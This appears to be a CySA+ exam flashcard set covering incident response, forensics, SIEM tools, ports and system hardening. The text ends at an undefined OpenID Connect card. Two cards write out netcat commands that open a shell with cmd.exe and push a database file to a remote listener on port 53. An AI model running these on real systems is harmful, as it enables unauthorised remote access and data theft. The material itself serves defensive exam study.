CySA+

Ace your homework & exams now with Quizwiz!

ARP Spoofing/ARP Poisoning

- occurs when an attacker redirects an IP address to a MAC address that was not its intended destination - can cause irregular peer to peer communications - use an IDS to identify the suspicious traffic patterns caused by ARP poisoning generating far more ARP traffic than usual

Google Hacking

- open-source intelligence techniques that uses Google search operators to locate vulnerable web servers and applications - use things like: Quotes, NOT, AND/OR, Scope, URL Modifiers

Footprinting *

- phase of an attack or penetration test in which the attacker or tester gathers information about the target before attacking it (targeting multiple machines) - tools that map out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace (subdomains and hostnames)

Legitimate processes (Behavior Analysis)

1. System Idle (PID 0) and System (PID 4) 2. Client Server Runtime SubSystem (csrss.exe) 3. WININIT (wininit.exe) 4. Services.exe (services.exe or svchost.exe) * 5. Local Security Authority SubSystem (lsass.exe) 6. WINLOGON (winlogon.exe) 7. USERINIT (userinit.exe) 8. Explorer (explorer.exe, should be the parent of all processes launched by the user)

Cryptographic Analysis Tools

- tools used to determine the type of encryption algorithm used and assess the strength of the encryption key - an analyst must recover or brute force the user password to obtain the decryption key for an encrypted volume

Best practices to secure network appliances

1. Use ACLs to restrict access to designated host devices 2. monitor the number of designated interfaces 3. deny internet access to remote management

Disadvantages of Agent-based Scanning

1. agents are limited to a particular operating system 2. could be compromised by malware

Detection and Analysis IOCs Sources (technical and non-technical)

1. anti-malware software 2. NIDS/NIPS 3. HIDS/HIPS 4. system logs 5. network device logs 6. SIEM data 7. flow control device 8. internal personnel 9. external personnel 10. cyber-threat intelligence

What might make a process look suspicious?

1. any process name that you do not recognize 2. any process name that is similar to a legitimate system process (ex. scvhost) 3. processes that appear without an icon, version information, description or company name 4. processes that are unsigned, especially from a well-known company like Microsoft 5. any process whose digital signature doesn't match the identified publisher 6. any process that does not have a parent/child relationship with a principle Windows process (explorer.exe) 7. any process hosted by Windows utilities like Explorer, Notepad, Task Manager 8. any process that is packed (compressed), highlights purple in Process Explorer (while this lesson focused on manual analysis, many UEBA products can automate this process)

5 categories of events in the Windows event logs

1. application (events generated by applications and services) 2. security (audit events like failed log-on or access being denied) 3. system (events generated by the operating system and its services) 4. setup (events generated during the installation of Windows) 5. forwarded events (events that are sent to the local host from other computers)

How do attackers compromise and exploit the controller area network (CAN) bus?

1. attach the exploit to OBD-II 2. exploit over onboard cellular (cell modem) 3. exploit over onboard Wi-Fi

Steps of a XSS attack

1. attacker identifies input validation vulnerability within a trusted website 2. attackers crafts a URL to perform code injection against the trusted website 3. the trusted site returns a page containing the malicious code injected 4. malicious code runs in the client's browser with permission level as the trusted site

Newer Implementations of Syslog (improvements for drawbacks)

1. can use port 1468 (TCP) for consistent delivery 2. can use TLS to encrypt messages sent to servers 3. can use MD-5 and SHA-1 for authentication and integrity 4. can use message filters, automated log analysis, event response scripting, and alternate message formats 5. the newer version of the server is called syslog-ng or rsyslog

How can you mitigate a DDoS Attack?

1. conduct real-time log analysis to identify patterns of suspicious traffic and redirect it to a black hole or sinkhole 2. use geolocation and IP reputation data to redirect or ignore suspicious traffic 3. aggressively close slower connections by reducing timeouts on affected servers 4. use caching and backend infrastructure to offload processing to other servers 5. utilize enterprise DDoS Protection services such as Cloud Flare or Akamai

How do you mitigate non-standard port usage on your networks?

1. configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces 2. configuration documentation should also show which server ports are allowed on any given host type (have good configuration management) 3. configure detection rules to detect mismatched protocol usage over a standard port

How can you detect and mitigate against a pass the hash attack? *

1. detecting these types of attacks is very difficult because the attacker activity cannot be easily differentiated from legitimate authentication 2. most antivirus and antimalware software will block tools that allow pass the hash attack (such as Mimikatz) 3. restrict and protect high privileged domain accounts 4. restrict and protect local accounts with administrative privileges 5. restrict inbound traffic using Windows Firewall to all workstations except for helpdesk, security compliance scanners and servers

How does an APT use modern malware to operate?

1. dropper or downloader 2. maintain access 3. strengthen access 4. actions on objectives 5. concealment

5 Steps for Conducting Containment (in order)

1. ensure the safety and security of all personnel 2. prevent an ongoing intrusion or data breach 3. identify if the intrusion is the primary or secondary attack 4. avoid alerting the attacker that the attack has been discovered 5. preserve any forensic evidence of the intrusion and attack

4 Key Controls for Mitigating Vulnerabilities in Specialized Systems

1. establish administrative control over operational technology (OT) networks by recruiting staff with relevant expertise 2. implement the minimum network links by disabling unnecessary links, services, and protocols 3. develop and test a patch management program for operational technology (OT) networks 4. perform regular audits of logical and physical access to systems to detect possible vulnerabilities and intrusions (*WARNING: Enumeration tools and vulnerability scanners can cause problems on OT networks*)

3 types of Trend Analysis

1. frequency-based 2. volume-based 3. statistical deviation

Forensic Procedures Four Main Areas:

1. identification 2. collection 3. analysis 4. reporting

What do you do when you find a suspicious process?

1. identify how the process interacts with the Registry and file system 2. determine how the process was launched 3. determine if that image file is located in the system folder or a temp folder 4. determine what files are being manipulated by the process 5. determine if the process restores itself upon reboot after deletion 6. determine if a system privilege or service gets blocked if you delete the process 7. determine if the process is interacting with the network (communication with CnC server)

What might indicate that a piece of malware is running on a part instead of an authorized application?

1. if an unknown open dynamic port (49152-65535) appears to be constantly open on a host, it may indicate a malicious traffic channel 2. non-standard port usage - communicating TCP/IP application traffic, such as HTTP, FTP, or DNS, over a port that is not the well-known or registered port established for that protocol

4 categories of severity inside the Windows event logs

1. information (used for successful events) 2. warning 3. error (significant problems that could result in reduced functionality) 4. audit success/failure

What kind of things can we expect to find when you start analyzing the image from memory?

1. list of running processes at the time of collection 2. password hashes 3. cryptographic keys (which can help you unlock encrypted hard drives that you wouldn't be able to access after you shut down the computer) 4. Registry keys 5. cached files 6. strings from open files

Four Most Common Categories to Perform System Memory Image Acquisition:

1. live acquisition 2. crash dump 3. hibernation file 4. pagefile

3 Different Ways to Perform Disk Image Acquisition

1. live acquisition (capturing the contents of the disk drive while the computer is still running) 2. static acquisition by shutting down 3. static acquisition by pulling the plug

To effectively deploy a SIEM you must consider *

1. log all relevant events and filter irrelevant data 2. establish and document scope of events 3. develop use cases to define a threat 4. plan incident response to an event 5. establish a ticketing process to track events 6. schedule regular threat hunting 7. provide auditors and analysts an evidence trail

Linux File System Analysis Tools

1. lsof 2. df 3. du

Rule options for IDS/IPS logs (Snort)

1. msg 2. flow 3. flags 4. track 5. reference 6. classtype 7. sid and rev

Best practices for configuring egress filters

1. only allow whitelisted application ports and destination addresses to leave your network 2. restrict DNS lookups to trusted and authorized DNS services 3. Block access to known bad IP address ranges (blacklist) 4. Block all internet access from host subnets that don't use it (ICS/SCADA systems)

4 Main Types of Recovery Actions

1. patching 2. permissions 3. logging 4. system hardening

3 types of Port Security

1. physical port security 2. MAC filtering 3. Network Access Control (NAC)

Digital Forensic Analysts Have Many Different Roles, Including:

1. planning IT systems and processes 2. investigating and reconstructing an incident 3. investigating if crimes occurred 4. collecting and protecting evidence 5. determining if data was exposed (data breach) 6. developing processes and tools 7. supporting ongoing audits

Key Features of a NAC solution

1. posture assessment 2. remediation 3. pre- and post-admission control

Linux Tools for Detecting Malicious Processes

1. pstree 2. ps

Advantages for using Agent-based scanning

1. reduces the impact on the network by reducing the network bandwidth 2. reduces the chance of service outages 3. better for mobile or remote devices when offline

System Hardening Security Checklist

1. remove or disable devices that are not needed or used 2. install OS, application, firmware, and driver patches regularly 3. uninstall all unnecessary network protocols 4. uninstall or disable all unnecessary services and shared folders 5. enforce ACLs on all system resources 6. restrict user accounts to the least privileges needed 7. secure the local admin or root account by renaming it and changing the default password 8. disable unnecessary default user and group accounts 9. verify permissions on system accounts and groups 10. install antimalware software and update its definitions regularly

Windows Tools for Detecting Malicious Processes

1. sfc (System File Checker) - scans all the files on the system to make sure they are protected and haven't been modified 2. Process Monitor 3. Process Explorer 4. tasklist 5. PE Explorer

Symptoms of anomalous activity include

1. strange log entries 2. excessive per-process ports 3. resource consumption 4. unusual user accounts

Different Ways Covert Channels Can Take Advantage

1. transmit data over nonstandard port (if egress filter on firewall is not enabled) 2. encoding data in TCP/IP packet headers 3. segmenting data in multiple packets 4. obfuscating data using hex 5. transmitting encrypted data

3 Simple Mottos for System Hardening *

1. uninstall anything you aren't using 2. if you need it, patch it frequently 3. always restrict users to least privilege

Unexpected Output (Anomalous Activity)

- unusual request patterns or responses can be indicative of an ongoing or past attack - detect a code injection by monitoring number of database reads or examining HTTP response packet sizes - if an application displays unformatted error messages or strange strings, it could be an indication of application tampering

Netcat (nc)

- utility for reading and writing raw data over a network connection that is often used as a listener for remote shells - can also be used with scripting or redirection to send and receive files

Unexpected Outbound Communication (Anomalous Activity)

- verify any outbound network connections (must understand and approve any connections leaving your network) - unexpected outbound communication could be a sign of a C2 channel or beaconing

Lost System Logs (Virtualization Forensics)

- virtual machines are optimized to spin up when needed and be destroyed when no longer required - *Solution* configure virtual machines to log events to a remote logging server to prevent system logs from being lost during deprovisioning

grep command line tools

-i (ignore case sensitivity) -v (return non-matching strings) -w (treat search strings as words) -c (return a count of matching strings only) -l (return names of files with matching lines) -L (return names of files without matching lines)

dir /Ax

/Ax filters all file/folder types that match the given parameter (x), such as dir/AH displays only hidden files and folders

dir /Q

/Q displays who owns each file, along with the standard information

dir /R

/R displays alternate data streams for a file

Basic principles for configuring firewall ACLs

1. Block incoming requests from internal or private, loopback, and multicast IP address ranges 2. Block incoming requests from protocols that should only be used locally (ICMP, DHCP, OSPF, SMB, etc) 3. configure IPv6 to either block all IPv6 traffic or allow it to authorized hosts and ports only

Order of Volatility (Descending from most volatile to least)

1. CPU registers and cache memory 2. contents of system memory (RAM), routing tables, ARP cache, process table, temporary swap files 3. data on persistent mass storage (HDD/SDD/flash drive) 4. remote logging and monitoring data 5. physical configuration and network topology 6. archival media

5 Different Types of Breaches (descending from most significant to least)

1. Data Exfiltration (an attacker breaks into the system and transfers data to another system) 2. Insider Data Exfiltration (an employee/ex employee with privileges on the system transfers data to another system) 3. Device Theft/Loss (a device, such as a smartphone or laptop, containing data is lost or stolen) 4. Accidental Data Breach (public disclosure of information or unauthorized transfer caused by human error or misconfiguration) 5. Integrity/Availability Breach (corruption of data or destruction of a system processing data)

Incident Classification Categories

1. Data integrity (any incident where data is modified or loses integrity) 2. System Process Criticality (incidents that disrupt or threaten a mission essential business function) 3. Downtime (an incident that degrades or interrupts the availability of an asset, system, or business process) 4. Economic (an incident that creates short-term or long-term costs) 5. Data Correlation (an incident that is linked to the TTP of known adversary groups with extensive capabilities) 6. Reverse Engineering (an incident which the capabilities of the malware are discovered to be linked to an adversary group) 7. Recovery Time (an incident which requires extensive recovery time due to its scope or severity) 8. Detection Time (an incident which was not discovered quickly)

Defensive Capabilities

1. Detect 2. Destroy 3. Degrade 4. Disrupt 5. Deny 6. Deceive

Forensic Tools Include:

1. EnCase 2. The Forensic Toolkit (FTK) 3. The Sleuth Kit

7 Step Process for Scanning Workflow (Vulnerability Scanning)

1. Install software and patches to establish a baselined system 2. perform an initial scan of the target system 3. analyze the assessment reports based on the baseline 4. perform corrective actions based on reported findings 5. perform another vulnerability scan and assessment 6. document any findings and create reports for relevant stakeholders 7. conduct ongoing scanning to ensure continual remediation (*Scan, Patch, Scan*)

Command and Control servers must issue commands to its zombies in the botnet using various communication channels, these include:

1. Internet Relay Chat (IRC) 2. HTTP and HTTPS 3. Domain Name System (DNS) 4. Social Media Websites 5. Cloud Services 6. Media and Document Files

Common Tools Used by Pentesters

1. Metasploit 2. Cobalt Strike 3. Kali Linux 4. ParrotOS 5. Commando OS

Incident Response Phases (CompTIA model)

1. Preparation 2. Detection & Analysis 3. Containment 4. Eradication & Recovery 5. Post-Incident Activity

How do you set up a listener to receive a file?

1. Setup a Listener to Receive: nc -l -p 53 > database.sql 2. Send a File to Listener type database.sql | nc 10.1.0.21 53 (type = print this file to screen, but by using the pipe command we can push it to the netcat listener)

How do you set up a regular shell on a victim system?

1. Setup a Listener: nc -l -p 443 -e cmd.exe (-l = listening, -p = port, -e = execute) 2. Connect to Listener: nc 10.1.0.1 443 (10.1.01 = the IP address im trying to connect to)

Common IDS/IPS softwares

1. Snort 2. Zeek (Bro) 3. Security Onion

Types of SIEM solutions

1. Splunk 2. ELK/Elastic Stack 3. ArcSight 4. QRadar 5. Alien Vault and OSSIM 6. Graylog

A nmap discovery scan is used to ...

Footprint the network

What is the key difference between Fingerprinting and Footprinting?

Footprinting is focused on the overall network layout, while Fingerprinting is focused on a single host or server

While a pass the hash attack will work on local workstations, a _______ ticket is needed in an Active Directory environment

Kerberos

Port 445 (UDP)

MICROSOFT-DS (Supports Windows File Sharing)

Port 445 (TCP)

MICROSOFT-DS (supports Windows File Sharing ~Server Message Block over TCP/IP~ on current Windows networks) (Windows only)

Malware Information Sharing Projects (MISP - Indicator Management)

MISP provides a server platform for cyber threat intelligence sharing, a proprietary format, supports OpenIOC definitions, and can import and export STIX over TAXII

Port 1434 (UDP port)

MS-SQL (Microsoft SQL Server) (Windows only)

Port 135 (UDP)

MSRPC (advertises what RPC services are available in a Windows environment)

Port 135 (TCP)

MSRPC (advertises what RPC services are available in a Windows environment) (Windows only)

_____ and _____ help to determine which business functions are critical and to specify appropriate risk countermeasures

MTD, RPO

Deny

Prevent an adversary from learning about your capabilities or accessing your information assets (ex. Firewall ACL, NIPS, Proxy filter, Patch, chroot jail)

FTP Access Logs

a log containing FTP traffic events in a W3C extended log format

Business Continuity Loss

a loss associated with no longer being able to fulfill contracts and orders due to the breakdown of critical systems

Cross-Site Request Forgery (XSRF/CSRF)

a malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser

behavior-based detection

a malware detection method that evaluates an object based on its intended actions before it can actually execute that behavior

Splunk

a market-leading big data information gathering and analysis tool that can import machine-generated data via a connector or visibility add-on

eFUSE

a means for software or firmware to permanently alter the state of a transistor on a computer chip (if the eFUSE is blown that means that firmware is no longer valid or trusted)

Memory Overflow

a means of exploiting a vulnerability in an application to execute arbitrary code or to crash the process (or with an ongoing memory leak to crash the system)

Flow Collector

a means of recording metadata and statistics about network traffic rather than recording each frame

Reimaging

a method of restoring a system that has been sanitized using an image-based backup

Reconstruction

a method of restoring a system that has been sanitized using scripted installation routines and templates

Zero-fill

a method of sanitizing a drive by overwriting all bits on a drive to zero (typically done with hard drives)

Cryptographic Erase (CE)

a method of sanitizing a self-encrypting drive (SSDs) by erasing the media encryption key

Secure Erase (SE)

a method of sanitizing a solid-state device (SSDs) using manufacturer provided software

Secure Disposal

a method of sanitizing that utilizes the physical destruction of the media by mechanical shredding, incineration, or degaussing (used for top secret data or high classification)

Domain Generated Algorithm (DGA)

a method used by malware to evade blacklists by generating domain names for C2 networks dynamically

Fast Flux Network

a method used by malware to hide the presence of C2 networks by continually changing the host IP addresses in domain records using domain generated algorithms (DGA)

Return on Security Investment (RSOI)

a metric to calculate whether a security control is worth the cost of deploying and maintaining it

Mobile Phone Examiner Plus (MPE+)

a mobile device forensics tool created by AccessData (the developers of FTK)

EnCase Portable (Mobile Device Forensics)

a mobile device forensics tool created by Guidance Software (the developers of EnCase)

Enterprise Mobility Management (EMM)

a mobile device management suite with broader capabilities, such as identity and application management

Yara

a multi-platform program running on Windows, Linux and Mac OS X for identifying, classifying, and describing malware samples (creates Yara rules)

Demilitarized Zone (DMZ)

a physical or logical subnetwork that contains and exposes an organizations external-facing services to an untrusted, usually larger, network such as the Internet

Downloader

a piece of code that connect to the Internet to retrieve additional tools after the initial infection by a dropper (stage 2)

Connectors or Plug-ins (Data Normalization)

a piece of software designed to provide parsing and normalization functions to a particular SIEM

Probing

a preliminary attack that is used to conduct reconnaissance or enumeration against a web service

Virtual Private Cloud (VPC)

a private network segment made available to a single cloud consumer within a public cloud (consumer is responsible for configuring the IP address space and routing within the cloud) (is typically used to provision internet-accessible applications that need to be accessed from geographically remote sites) (considered an IaaS product)

Continuous Delivery (CI/CD)

a software development method where application and platform requirements are frequently tested and validated for immediate availability (must have continuous integration before this) (focuses on automated testing of code in order to get it ready for release)

Port 1900 (UDP port)

UPNP (universal plug and play is used for auto-configuration of port forwarding by gaming consoles and other smart appliances)

Continuous Deployment (CI/CD)

a software development method where application and platform updates are committed to production rapidly (focuses on automated testing and release of code in order to get it into the production environment more quickly) (takes it a step further then continuous delivery by releasing the code)

Port 5900 (TCP)

VNC (virtual network computing remote access service where security is implementation dependent and VNC may use other ports) (Unix, Linux, MacOS, Windows)

XML Bomb (Billion Laughs Attack)

XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it (similar to DoS)

Sinkhole

a DoS attack mitigation strategy that directs the traffic that is flooding a target IP address to a different network for analysis

pstree

a Linux command that provides the parent/child relationship of the processes on a given system

Security Content Automation Protocol (SCAP)

a NIST framework that outlines various accepted practices for automating vulnerability scanning by adhering to standards for scanning processes, results reporting and scoring, and vulnerability prioritization (used to uphold internal and external compliance requirements) - 2 main components: OVAL and XCCDF

Sensors (Data Normalization)

a SIEM can collect packet capture and traffic flow data from sniffers and sensors positions across the network

ArcSight

a SIEM log management and analytics software that can be used for compliance reporting for legislation and regulations like HIPPA, SOX, and PCI DSS

QRadar

a SIEM log management, analytics, and compliance reporting platform created by IBM

sigcheck

a Sysinternals utility that allows you to verify root certificates in the local store against Microsoft's master trust list

Measured Boot

a UEFI feature that gathers secure metrics to validate the boot process in an attestation report

Secure Boot

a UEFI feature that prevents unwanted processes from executing during the boot operation

dd (.dd format)

a Unix/Linux/MacOS command that can perform disk image acquisition (disk duplicator)

certutil

a Windows utility that allows you to display CA configuration information, configure Certificate Services, backup and restore CA components, and verify the certificates key pair, and certificate chains

Widows Firewall

a Windows-based firewall that uses the W3C Extended Log File Format

Daemons

a background service in the Linux operating system that runs as a process with the letter 'd' after it (e.g, httpd, sshd, ftpd)

Mission Essential Function (MEF) *

a business or organizational activity that is too critical to be deferred for anything more than a few hours (if at all)

Playbook

a checklist of actions an analyst performs to detect and respond to a specific type of incident

Attestation

a claim that the data presented in the report is valid by digitally signing it using the TPM's private key

Rootkit

a class of malware that modifies system files (often at the kernel level) to conceal its presence

Security Orchestration, Automation, and Response (SOAR)

a class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment (SIEM 2.0) (next-gen SIEM, a SIEM with an integrated SOAR) (primarily used for incident response)

unknown unknowns

a classification of malware that contains completely new attack vectors and exploits

known unknowns

a classification of malware that contains obfuscation techniques to circumvent signature-matching and detection

Function as a Service (FAAS)

a cloud service model that supports serverless software architecture by provisioning runtime containers in which code is executed in a particular programming language (essentially it allows us to run things and create applications without having our own servers)

Qualys

a cloud-based vulnerability management solution with installed sensor agents at various points in their network and the sensors upload data to the cloud platform for analysis

DevSecOps

a combination of software development, security operations, and system operations by integrating each discipline with the others (utilizes a shift-left mindset, which means security is developed earlier in the lifecycle)

grep (commands that rely on regex) *

a command on Unix/Linux/macOS systems that invokes simple string matching or regex syntax to search text files for specific strings (use grep to search the contents if analyzing the contents on Linux)

sort (commands that rely on regex)

a command that can be used to change the output order

cut (commands that rely on regex)

a command that enables the user to specify which text on a line they want removed from the results

head (commands that rely on regex)

a command that outputs the first 10 lines of a file specified

tail (commands that rely on regex)

a command that outputs the last 10 lines of a file specified (this command is very useful when dealing with logs)

Reaver (Wireless Assessment Tools)

a command-line tool used to perform brute force attacks against WPS-enabled access points

Nessus

a commercial vulnerability scanner produced by Tenable Network Security for on-premise and cloud-based vulnerability scanning

Enterprise Service Bus (ESB)

a common component of SOA architecture that facilitates decoupled service-to-service communication

SysAdmin, Network, and Security (SANS) institute

a company specializing in cybersecurity and secure web application development training and sponsors the GIAC certification

Machine Learning

a component of AI that enables a machine to develop strategies for solving a task given a labeled dataset where features have been manually identified but without further explicit instructions

Machine Learning (ML)

a component of AI that enables a machine to develop strategies for solving a task given a labeled dataset where features have been manually identified but without further explicit instructions (is only as good as the datasets used to train it) (assists with data correlation)

Full/Deep Assessment Scan

a comprehensive scan that forces the use of more plug-in types, takes longer to conduct host scanning, and has more risk of causing a service disruption

Embedded Systems

a computer system that is designed to perform a specific, dedicated function

Blinding Attack

a condition that occurs when a firewall is under-resourced and cannot log data fast enough, therefore some data is missed

Cross Origin Resource Sharing (CORS) Policy

a content delivery network policy that instructs the browser to treat requests from nominated domains as safe (*WARNING: weak CORS policies expose the site to vulnerabilities like XSS*)

Service Level Agreement (SLA)

a contractual agreement setting out the detailed terms under which an ongoing service is provided

tcpdump

a data-network packet analyzer computer program that runs under a command line interface and allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached

Exception Management

a defined process to closely monitor systems that cannot be patched or remediated and must be excepted from scans

OAuth (Open Authorization)

a delegated authorization framework for RESTful APIs that enables apps to obtain limited access (scopes) to a user's data without giving away a user's password (OAuth2 is explicitly designed to authorize claims and not authenticate users) (must be paired with another tool to perform authentication, typically uses OIDC for authentication) (*OAuth2 is vulnerable to CSRF attacks and open redirects*)

Forensic Watermark

a digital watermark can defeat attempts at removal by cropping pages or images in the file

Self-Encrypting Drives

a disk drive where the controller can automatically encrypt data that is written to it (uses firmware to run the encryption process and all of this is done at the hardware level)

Fuzzing

a dynamic code analysis technique that involves sending a running application random and unusual input to evaluate how the application responds (is a technique designed to test software for bugs and vulnerabilities)

Debugger

a dynamic testing tool used to analyze software as it executes (allows us to pause execution and to monitor/adjust the value of variables at different stages)

Hibernation File (System Memory Image Acquisition)

a file that is written to the disk when the workstation is put into a sleep state (drawback is some malware can detect the use of a sleep state and perform anti-forensics)

Prefetch Files *

a file that records the names of applications that have been run, as well as the data and time, file path, run count, and DLLs used by the executable

pagefile/swap file (System Memory Image Acquisition)

a file that stores pages of memory in use that exceed the capacity of the host's physical RAM modules (is not structured in a way that analysis tools can interpret but can be used to search for strings)

Pretext

a form of social engineering in which an individual lies and provides a false motive to obtain privileged data

Narrative-based Threat Awareness and Intelligence

a form of trend analysis that is reported in longform prose to describe a common attack vector seen overtime

OpenIOC (Indicator Management)

a framework by Mandiant that uses XML-formatted files for supplying codified information to automate incident detection and analysis

Diamond Model of Intrusion Analysis (Attack Framework)

a framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim

Domain-Based Message Authentication, Reporting, and Conformance (DMARC)

a framework for ensuring proper application of SPF and DKIM utilizing a policy published as a DNS record (can use either SPF or DKIM or both)

Wireshark

a free and open-source GUI-based packet analyzer that is used for network troubleshooting, analysis, software and communications protocol development, and education

Statistical/Lexicon (DLP Discovery and Classification)

a further refinement of partial document matching is to use machine learning to analyze a range of data sources

Internet Relay Chat (IRC)

a group communication protocol with networks divided into discrete channels that are the individual forums used by clients to chat

Regular Expression (regex)

a group of characters that describe how to execute a specific search pattern on a given text

Internet of Things (IoT)

a group of objects (electronic or not) that are connected to the wider Internet by using embedded electronic components

Jumpbox

a hardened server that provides access to other hosts within the DMZ (allows secure communication from the internal network to hosts within the DMZ) (typically configure VMs as Jumpboxes)

Vulnerability Scanner

a hardware appliance or software application that is configured with a list of known weaknesses and exploits and can scan for their presence in a host operating system or within a particular application

Registry

a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for the kernel, device drivers, services, Security Accounts Manager, and the user interface

Virtualization

a host computer is installed with a hypervisor that can be used to install and manage multiple guest operating systems or VMs

Digital Forensics Kit

a kit containing the software and hardware tools required to acquire and analyze evidence from system memory dumps and mass storage file systems

MITRE ATT&CK Framework (Attack Framework)

a knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and common knowledge or procedures

Due Diligence

a legal principle that a subject has used best practice or reasonable care when setting up, configuring, and maintaining a system

iptables

a linux-based firewall that uses the syslog file format for its logs

Access Control Lists (ACL)

a list of IP addresses and ports that are allowed or denied access to the network segment or zone

Script

a list of commands that are executed by a certain program or scripting engine (Bash, PowerShell, Python, Ruby, AWK)

Access Control List (ACLs)

a list of permitted and denied network connections based on either IP addresses, ports, or applications in use

Continuous Integration (CI/CD)

a software development method where code updates are tested and committed to a development or build server/code repository rapidly (can test and commit updates multiple times per day) (detects and resolves development conflicts early and often)

Agile Method

a software development model that focuses on iterative and incremental development to account for evolving requirements and expectations

Waterfall Method

a software development model where the phases of the SDLC cascade so that each phase will start only when all tasks identified in the previous phase are complete (traditional method)

Stress Test

a software testing method that evaluates how software performs under extreme load (is used to determine what could trigger a DoS)

Dereferencing

a software vulnerability that occurs when the code attempts to remove the relationship between a pointer and the thing it points to

Race Conditions

a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer (can be used against databases, file systems, operating system, kernel, or memory)

802.1X

a standard for encapsulating EAP (Extensible Authentication Protocol) communications over a LAN or wireless LAN and that provides port-based authentication

Malware Attribute Enumeration and Characterization (MAEC) Scheme

a standardized language for sharing structured information about malware that is complementary to STIX and TAXII to improve the automated sharing of threat intelligence

SIEM Correlation Rule

a statement that matches certain conditions as expressed using logical expressions, such as AND and OR, and operators, such as == (matches), < (less than), > (greater than), and in (contains)

Normalization (Secure Coding)

a string is stripped of illegal characters or substrings and converted to the accepted character set

Exact Data Match (EDM) (DLP Discovery and Classification)

a structured database of string values to match

Port-based NAC

a switch (or router) that performs some sort of authentication of the attached device before activating the port

Vulnerability Feed

a synchronized list of data and scripts used to check for vulnerabilities, also known as plug-ins or network vulnerability tests (NVTs) (similar to antivirus signatures)

Business Impact Analysis (BIA)

a systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations

cron

a task scheduler in Linux that can configure processes to run as daemons (background processes or services) during the machines startup

Parameterized Queries

a technique that defends against SQL injection and insecure object references by incorporating placeholders in a SQL query (form of output encoding)

Address Space Layout Randomization (ASLR)

a technique that randomizes where components in a running application are placed in memory to protect against buffer overflows

Fast Flux DNS

a technique that rapidly changes the IP addresses associated with a domain (can be detected by looking at communication patterns in the proxy logs)

nmap -f or --mtu (Fragmentation)

a technique that splits the TCP header of each probe between multiple IP datagrams to make it harder for an IDS or IPS to detect

Policy Template (DLP Discovery and Classification)

a template contains dictionaries optimized for data points in a regulatory or legislative schema (specialized dictionary)

Buffer

a temporary storage area that a program uses to store data

JSON Web Tokens (JWT)

a token format that contains a header, payload, and signature in the form of a JavaScript Object Notation (JSON) message (similar to OAuth, used for authorization)

regdump

a tool that dumps the contents of the registry in a text file with simple formatting so that you can search specific strings in the file using the 'find' command

curl

a tool to transfer data from or to a server, using of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP, FILE) (used to test APIs)

Multi Router Traffic Grapher (MRTG)

a tool used to create graphs showing traffic flows through the network interfaces of routers and switches by polling the appliances using the Simple Network Management Protocol (SNMP)

HIDS/HIPS (endpoint protection tool)

a type of IDS/IPS that monitors a computer system for unexpected behavior or drastic changes to the system's state on an endpoint

Real-Time Operating System (RTOS)

a type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks

Programmable Logic Controller (PLC) (Embedded System)

a type of computer designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems (runs on firmware which can be patched and reprogrammed to fix vulnerabilities)

System Isolation (Air Gap)

a type of network isolation that physically separates a network from all other networks

Session Hijacking

a type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address (can occur through the theft or modification of cookies)

Unified Extensible Firmware Interface (UEFI)

a type of system firmware providing support for 64-bit CPU operation at boot, full GUI and mouse operation at boot, and better boot security (Secure Boot, Measured Boot)

Containerization

a type of virtualization applied by a host operating system to provision an isolated execution environment for an application

Process Identification (PID)

a unique identification number of a process launched by a Linux system

parent process ID (PPID)

a unique identification number of the parent process for every process launched by a Linux system

Nmap Security Scanner

a versatile port scanner used for topology, host, service, and OS discovery and enumeration

Virtual Desktop Infrastructure (VDI) *

a virtualization implementation that separates the personal computing environment from a user's physical computer (disadvantage is that users have no local processing ability if the server or network is down)

Web Application Scanner

a vulnerability testing tool designed to identify issues with web servers and web applications (used to detect XSS, SQL injection, and other types of web attacks)

Remote Code Execution

a vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability

File Inclusion

a web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system (by using directory traversal) or to upload an executable or script file to open a backdoor (this is a type of directory traversal)

reference (rule options)

able to match an entry to an attack database (ex. you might want to have it match the MITRE ATT&CK database, so you'd have an ID number that matches that)

Discretionary Access Control (DAC)

access control model where each resource is protected by an ACL managed by the resources owner (e.g, Windows)

Role-base Access Control (RBAC)

access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions

Mandatory Access Control (MAC)

access control model where resources are protected by inflexible, system defined rules where resources (object) and user (subject) is allocated a clearance level (or label)

Attribute-Based Access Control (ABAC)

access control technique that evaluates a set of attributes that each subject possesses to determine if access should be granted (can be used to implement controls for separation of duties)

Persistent Data Acquisition (Virtualization Forensics)

acquiring data from persistent devices, such as virtual hard drives and other virtualized mass storage devices to an image-based format

Taxonomy-based Approach (Impact Analysis)

an approach that defines incident categories at the top level, such as worm outbreak, phishing attempt, DDoS, external host/account compromise, or internal privilege abuse

Artificial Neural Networks (ANNs)

an architecture of input, hidden, and output layers that can perform algorithmic analysis of a dataset to achieve outcome objectives (a machine learning system adjusts its neural network to reduce errors and optimize objectives)

Integer Overflow

an attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow

Buffer Overflow

an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory

XML External Entity (XXE)

an attack that embeds a request for a local resource (similar to file inclusion)

Coercive Parsing

an attack that modifies requests to a SOAP web service in order to cause the service to parse the XML-based requests in a harmful way (can cause an exploit to run or a DoS)

DDoS (Traffic Spikes)

an attack that uses multiple compromised hosts (a botnet) to overwhelm a service with request or response traffic

Prowler

an auditing tool for AWS that is used to evaluate the cloud infrastructure against AWS benchmarks, GDPR compliance, and HIPAA compliance

OpenID Connect (OIDC)

